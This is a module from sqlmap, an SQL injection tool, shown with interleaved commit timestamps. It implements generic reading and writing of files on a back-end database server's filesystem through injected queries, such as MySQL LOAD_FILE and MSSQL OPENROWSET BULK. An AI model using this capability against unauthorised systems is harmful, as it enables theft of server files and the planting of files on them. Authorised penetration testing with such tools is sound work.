2013-02-14 15:32:17 +04:00
#!/usr/bin/env python
2008-10-15 19:38:22 +04:00
"""
2017-01-02 16:19:18 +03:00
Copyright ( c ) 2006 - 2017 sqlmap developers ( http : / / sqlmap . org / )
2017-10-11 15:50:46 +03:00
See the file ' LICENSE ' for copying permission
2008-10-15 19:38:22 +04:00
"""
2009-04-22 15:48:07 +04:00
import os
2015-07-26 17:34:11 +03:00
import sys
2009-04-22 15:48:07 +04:00
from lib . core . agent import agent
from lib . core . common import dataToOutFile
2011-01-28 19:36:09 +03:00
from lib . core . common import Backend
2014-12-02 12:29:09 +03:00
from lib . core . common import checkFile
2013-01-08 13:23:02 +04:00
from lib . core . common import decloakToTemp
2012-12-07 13:57:57 +04:00
from lib . core . common import decodeHexValue
2015-07-26 17:34:11 +03:00
from lib . core . common import getUnicode
2012-04-04 13:25:05 +04:00
from lib . core . common import isNumPosStrValue
2012-06-14 17:38:53 +04:00
from lib . core . common import isListLike
2013-02-13 12:57:16 +04:00
from lib . core . common import isStackingAvailable
2010-12-18 18:57:47 +03:00
from lib . core . common import isTechniqueAvailable
2009-04-22 15:48:07 +04:00
from lib . core . common import readInput
2010-03-27 02:23:25 +03:00
from lib . core . data import conf
2012-07-06 16:24:44 +04:00
from lib . core . data import kb
2009-04-22 15:48:07 +04:00
from lib . core . data import logger
2010-11-08 12:20:02 +03:00
from lib . core . enums import DBMS
2012-04-04 13:25:05 +04:00
from lib . core . enums import CHARSET_TYPE
from lib . core . enums import EXPECTED
2010-12-18 18:57:47 +03:00
from lib . core . enums import PAYLOAD
2012-12-06 17:14:19 +04:00
from lib . core . exception import SqlmapUndefinedMethod
2016-06-19 18:44:47 +03:00
from lib . core . settings import UNICODE_ENCODING
2009-04-22 15:48:07 +04:00
from lib . request import inject
2008-10-15 19:38:22 +04:00
class Filesystem :
"""
This class defines generic OS file system functionalities for plugins .
"""
2009-04-22 15:48:07 +04:00
def __init__ ( self ) :
self . fileTblName = " sqlmapfile "
2011-04-30 17:20:05 +04:00
self . tblField = " data "
2009-04-22 15:48:07 +04:00
2012-12-18 21:49:18 +04:00
def _checkFileLength ( self , localFile , remoteFile , fileRead = False ) :
2011-04-30 18:54:29 +04:00
if Backend . isDbms ( DBMS . MYSQL ) :
2014-08-16 16:23:07 +04:00
lengthQuery = " LENGTH(LOAD_FILE( ' %s ' )) " % remoteFile
2009-04-22 15:48:07 +04:00
2013-01-14 17:43:03 +04:00
elif Backend . isDbms ( DBMS . PGSQL ) and not fileRead :
2015-07-24 15:56:45 +03:00
lengthQuery = " SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid= %d " % self . oid
2009-04-22 15:48:07 +04:00
2011-04-30 18:54:29 +04:00
elif Backend . isDbms ( DBMS . MSSQL ) :
2013-01-07 19:36:29 +04:00
self . createSupportTbl ( self . fileTblName , self . tblField , " VARBINARY(MAX) " )
inject . goStacked ( " INSERT INTO %s ( %s ) SELECT %s FROM OPENROWSET(BULK ' %s ' , SINGLE_BLOB) AS %s ( %s ) " % ( self . fileTblName , self . tblField , self . tblField , remoteFile , self . fileTblName , self . tblField ) ) ;
2009-04-22 15:48:07 +04:00
lengthQuery = " SELECT DATALENGTH( %s ) FROM %s " % ( self . tblField , self . fileTblName )
2015-11-20 19:01:41 +03:00
try :
localFileSize = os . path . getsize ( localFile )
except OSError :
warnMsg = " file ' %s ' is missing " % localFile
logger . warn ( warnMsg )
localFileSize = 0
2009-04-22 15:48:07 +04:00
2013-01-14 16:22:15 +04:00
if fileRead and Backend . isDbms ( DBMS . PGSQL ) :
2015-09-03 11:19:59 +03:00
logger . info ( " length of read file ' %s ' cannot be checked on PostgreSQL " % remoteFile )
2013-01-14 16:22:15 +04:00
sameFile = True
2009-04-22 15:48:07 +04:00
else :
2015-09-03 11:19:59 +03:00
logger . debug ( " checking the length of the remote file ' %s ' " % remoteFile )
2013-01-14 16:22:15 +04:00
remoteFileSize = inject . getValue ( lengthQuery , resumeValue = False , expected = EXPECTED . INT , charsetType = CHARSET_TYPE . DIGITS )
sameFile = None
if isNumPosStrValue ( remoteFileSize ) :
remoteFileSize = long ( remoteFileSize )
2016-06-19 18:44:47 +03:00
localFile = getUnicode ( localFile , encoding = sys . getfilesystemencoding ( ) or UNICODE_ENCODING )
2013-01-14 16:22:15 +04:00
sameFile = False
if localFileSize == remoteFileSize :
sameFile = True
2015-09-03 11:19:59 +03:00
infoMsg = " the local file ' %s ' and the remote file " % localFile
2015-09-03 11:32:22 +03:00
infoMsg + = " ' %s ' have the same size ( %d B) " % ( remoteFile , localFileSize )
2013-01-14 16:22:15 +04:00
elif remoteFileSize > localFileSize :
2015-09-03 11:32:22 +03:00
infoMsg = " the remote file ' %s ' is larger ( %d B) than " % ( remoteFile , remoteFileSize )
2015-09-03 11:19:59 +03:00
infoMsg + = " the local file ' %s ' ( %d B) " % ( localFile , localFileSize )
2013-01-14 16:22:15 +04:00
else :
2015-09-03 11:32:22 +03:00
infoMsg = " the remote file ' %s ' is smaller ( %d B) than " % ( remoteFile , remoteFileSize )
infoMsg + = " file ' %s ' ( %d B) " % ( localFile , localFileSize )
2013-01-14 16:22:15 +04:00
logger . info ( infoMsg )
else :
sameFile = False
2014-08-21 02:32:15 +04:00
warnMsg = " it looks like the file has not been written (usually "
2016-05-24 13:30:01 +03:00
warnMsg + = " occurs if the DBMS process user has no write "
2014-08-21 02:32:15 +04:00
warnMsg + = " privileges in the destination path) "
2013-01-14 16:22:15 +04:00
logger . warn ( warnMsg )
2009-04-22 15:48:07 +04:00
2012-04-25 11:40:42 +04:00
return sameFile
2009-04-22 15:48:07 +04:00
def fileToSqlQueries ( self , fcEncodedList ) :
"""
Called by MySQL and PostgreSQL plugins to write a file on the
back - end DBMS underlying file system
"""
2011-04-30 17:20:05 +04:00
counter = 0
2009-04-22 15:48:07 +04:00
sqlQueries = [ ]
for fcEncodedLine in fcEncodedList :
if counter == 0 :
sqlQueries . append ( " INSERT INTO %s ( %s ) VALUES ( %s ) " % ( self . fileTblName , self . tblField , fcEncodedLine ) )
else :
2013-01-08 13:55:25 +04:00
updatedField = agent . simpleConcatenate ( self . tblField , fcEncodedLine )
2009-04-22 15:48:07 +04:00
sqlQueries . append ( " UPDATE %s SET %s = %s " % ( self . fileTblName , self . tblField , updatedField ) )
counter + = 1
return sqlQueries
2015-07-24 15:56:45 +03:00
def fileEncode ( self , fileName , encoding , single , chunkSize = 256 ) :
2009-04-22 15:48:07 +04:00
"""
Called by MySQL and PostgreSQL plugins to write a file on the
back - end DBMS underlying file system
"""
2017-01-31 16:00:12 +03:00
checkFile ( fileName )
2012-12-23 22:34:35 +04:00
with open ( fileName , " rb " ) as f :
2015-07-24 15:56:45 +03:00
content = f . read ( )
return self . fileContentEncode ( content , encoding , single , chunkSize )
def fileContentEncode ( self , content , encoding , single , chunkSize = 256 ) :
retVal = [ ]
if encoding :
content = content . encode ( encoding ) . replace ( " \n " , " " )
2009-04-22 15:48:07 +04:00
2010-01-02 05:02:12 +03:00
if not single :
2015-07-24 15:56:45 +03:00
if len ( content ) > chunkSize :
for i in xrange ( 0 , len ( content ) , chunkSize ) :
_ = content [ i : i + chunkSize ]
2009-04-22 15:48:07 +04:00
if encoding == " hex " :
2012-07-24 16:35:56 +04:00
_ = " 0x %s " % _
elif encoding == " base64 " :
_ = " ' %s ' " % _
2009-04-22 15:48:07 +04:00
2012-07-24 16:35:56 +04:00
retVal . append ( _ )
2009-04-22 15:48:07 +04:00
2012-07-24 16:35:56 +04:00
if not retVal :
2009-04-22 15:48:07 +04:00
if encoding == " hex " :
2012-07-24 16:35:56 +04:00
content = " 0x %s " % content
2009-04-22 15:48:07 +04:00
elif encoding == " base64 " :
2012-07-24 16:35:56 +04:00
content = " ' %s ' " % content
2009-04-22 15:48:07 +04:00
2013-01-10 14:54:07 +04:00
retVal = [ content ]
2009-04-22 15:48:07 +04:00
2012-07-24 16:35:56 +04:00
return retVal
2009-04-22 15:48:07 +04:00
2013-01-23 05:27:01 +04:00
def askCheckWrittenFile ( self , localFile , remoteFile , forceCheck = False ) :
2017-04-18 16:48:05 +03:00
choice = None
2013-01-23 06:10:38 +04:00
2013-01-23 05:27:01 +04:00
if forceCheck is not True :
message = " do you want confirmation that the local file ' %s ' " % localFile
message + = " has been successfully written on the back-end DBMS "
2015-09-03 11:19:59 +03:00
message + = " file system ( ' %s ' )? [Y/n] " % remoteFile
2017-04-18 16:48:05 +03:00
choice = readInput ( message , default = ' Y ' , boolean = True )
2012-12-18 21:49:18 +04:00
2017-04-18 16:48:05 +03:00
if forceCheck or choice :
2012-12-18 21:49:18 +04:00
return self . _checkFileLength ( localFile , remoteFile )
return True
def askCheckReadFile ( self , localFile , remoteFile ) :
message = " do you want confirmation that the remote file ' %s ' " % remoteFile
message + = " has been successfully downloaded from the back-end "
message + = " DBMS file system? [Y/n] "
2009-04-22 15:48:07 +04:00
2017-04-18 16:48:05 +03:00
if readInput ( message , default = ' Y ' , boolean = True ) :
2012-12-18 21:49:18 +04:00
return self . _checkFileLength ( localFile , remoteFile , True )
2012-04-25 11:40:42 +04:00
2012-12-19 17:42:56 +04:00
return None
2009-04-22 15:48:07 +04:00
2012-12-18 21:49:18 +04:00
def nonStackedReadFile ( self , remoteFile ) :
2012-07-06 18:13:50 +04:00
errMsg = " ' nonStackedReadFile ' method must be defined "
2010-03-23 01:57:57 +03:00
errMsg + = " into the specific DBMS plugin "
2013-01-04 02:20:55 +04:00
raise SqlmapUndefinedMethod ( errMsg )
2010-03-23 01:57:57 +03:00
2012-12-18 21:49:18 +04:00
def stackedReadFile ( self , remoteFile ) :
2011-04-30 17:20:05 +04:00
errMsg = " ' stackedReadFile ' method must be defined "
2010-03-23 01:57:57 +03:00
errMsg + = " into the specific DBMS plugin "
2013-01-04 02:20:55 +04:00
raise SqlmapUndefinedMethod ( errMsg )
2010-03-23 01:57:57 +03:00
2013-02-14 17:18:33 +04:00
def unionWriteFile ( self , localFile , remoteFile , fileType , forceCheck = False ) :
2011-04-30 17:20:05 +04:00
errMsg = " ' unionWriteFile ' method must be defined "
2010-03-23 01:57:57 +03:00
errMsg + = " into the specific DBMS plugin "
2013-01-04 02:20:55 +04:00
raise SqlmapUndefinedMethod ( errMsg )
2010-03-23 01:57:57 +03:00
2013-02-14 17:18:33 +04:00
def stackedWriteFile ( self , localFile , remoteFile , fileType , forceCheck = False ) :
2011-04-30 17:20:05 +04:00
errMsg = " ' stackedWriteFile ' method must be defined "
2010-03-23 01:57:57 +03:00
errMsg + = " into the specific DBMS plugin "
2013-01-04 02:20:55 +04:00
raise SqlmapUndefinedMethod ( errMsg )
2010-03-23 01:57:57 +03:00
2012-12-18 21:55:21 +04:00
def readFile ( self , remoteFiles ) :
2012-12-19 18:12:09 +04:00
localFilePaths = [ ]
2009-04-22 15:48:07 +04:00
self . checkDbmsOs ( )
2017-04-18 16:56:24 +03:00
for remoteFile in remoteFiles . split ( ' , ' ) :
2012-12-19 18:12:09 +04:00
fileContent = None
2012-12-18 21:55:21 +04:00
kb . fileReadMode = True
2012-07-06 16:24:44 +04:00
2013-02-13 12:57:16 +04:00
if conf . direct or isStackingAvailable ( ) :
if isStackingAvailable ( ) :
2012-12-18 21:55:21 +04:00
debugMsg = " going to read the file with stacked query SQL "
debugMsg + = " injection technique "
logger . debug ( debugMsg )
fileContent = self . stackedReadFile ( remoteFile )
elif Backend . isDbms ( DBMS . MYSQL ) :
debugMsg = " going to read the file with a non-stacked query "
debugMsg + = " SQL injection technique "
2010-03-27 02:23:25 +03:00
logger . debug ( debugMsg )
2009-04-22 15:48:07 +04:00
2012-12-18 21:55:21 +04:00
fileContent = self . nonStackedReadFile ( remoteFile )
else :
errMsg = " none of the SQL injection techniques detected can "
errMsg + = " be used to read files from the underlying file "
errMsg + = " system of the back-end %s server " % Backend . getDbms ( )
logger . error ( errMsg )
2012-07-06 18:13:50 +04:00
2012-12-19 18:12:09 +04:00
fileContent = None
2011-02-06 18:23:27 +03:00
2012-12-18 21:55:21 +04:00
kb . fileReadMode = False
2009-04-22 15:48:07 +04:00
2012-12-18 21:55:21 +04:00
if fileContent in ( None , " " ) and not Backend . isDbms ( DBMS . PGSQL ) :
self . cleanup ( onlyFileTbl = True )
elif isListLike ( fileContent ) :
newFileContent = " "
2009-04-22 15:48:07 +04:00
2012-12-18 21:55:21 +04:00
for chunk in fileContent :
if isListLike ( chunk ) :
if len ( chunk ) > 0 :
chunk = chunk [ 0 ]
else :
chunk = " "
2009-07-09 15:50:15 +04:00
2012-12-18 21:55:21 +04:00
if chunk :
newFileContent + = chunk
2009-07-09 15:50:15 +04:00
2012-12-18 21:55:21 +04:00
fileContent = newFileContent
2009-07-09 15:50:15 +04:00
2012-12-19 18:12:09 +04:00
if fileContent is not None :
2015-07-15 12:15:06 +03:00
fileContent = decodeHexValue ( fileContent , True )
2009-04-22 15:48:07 +04:00
2012-12-21 13:51:35 +04:00
if fileContent :
localFilePath = dataToOutFile ( remoteFile , fileContent )
2009-04-22 15:48:07 +04:00
2012-12-21 13:51:35 +04:00
if not Backend . isDbms ( DBMS . PGSQL ) :
self . cleanup ( onlyFileTbl = True )
2012-12-19 17:42:56 +04:00
2012-12-21 13:51:35 +04:00
sameFile = self . askCheckReadFile ( localFilePath , remoteFile )
2009-04-22 15:48:07 +04:00
2012-12-21 13:51:35 +04:00
if sameFile is True :
localFilePath + = " (same file) "
elif sameFile is False :
localFilePath + = " (size differs from remote file) "
localFilePaths . append ( localFilePath )
else :
errMsg = " no data retrieved "
logger . error ( errMsg )
2012-12-18 21:49:18 +04:00
2012-12-19 18:12:09 +04:00
return localFilePaths
2009-04-22 15:48:07 +04:00
2013-01-23 05:27:01 +04:00
def writeFile ( self , localFile , remoteFile , fileType = None , forceCheck = False ) :
written = False
2014-12-02 12:29:09 +03:00
checkFile ( localFile )
2009-04-22 15:48:07 +04:00
self . checkDbmsOs ( )
2013-01-08 13:23:02 +04:00
if localFile . endswith ( ' _ ' ) :
localFile = decloakToTemp ( localFile )
2013-01-07 18:55:40 +04:00
2013-02-13 12:57:16 +04:00
if conf . direct or isStackingAvailable ( ) :
if isStackingAvailable ( ) :
2015-09-03 11:19:59 +03:00
debugMsg = " going to upload the file ' %s ' with " % fileType
2010-03-27 02:23:25 +03:00
debugMsg + = " stacked query SQL injection technique "
logger . debug ( debugMsg )
2008-10-15 19:38:22 +04:00
2013-01-23 05:27:01 +04:00
written = self . stackedWriteFile ( localFile , remoteFile , fileType , forceCheck )
2010-03-27 02:23:25 +03:00
self . cleanup ( onlyFileTbl = True )
2011-02-06 18:23:27 +03:00
elif isTechniqueAvailable ( PAYLOAD . TECHNIQUE . UNION ) and Backend . isDbms ( DBMS . MYSQL ) :
2015-09-03 11:19:59 +03:00
debugMsg = " going to upload the file ' %s ' with " % fileType
2010-03-27 02:23:25 +03:00
debugMsg + = " UNION query SQL injection technique "
2009-04-22 15:48:07 +04:00
logger . debug ( debugMsg )
2008-10-15 19:38:22 +04:00
2013-01-23 06:10:38 +04:00
written = self . unionWriteFile ( localFile , remoteFile , fileType , forceCheck )
2011-02-06 18:23:27 +03:00
else :
errMsg = " none of the SQL injection techniques detected can "
2011-02-06 18:28:23 +03:00
errMsg + = " be used to write files to the underlying file "
errMsg + = " system of the back-end %s server " % Backend . getDbms ( )
2011-02-06 18:23:27 +03:00
logger . error ( errMsg )
return None
2013-01-23 05:27:01 +04:00
return written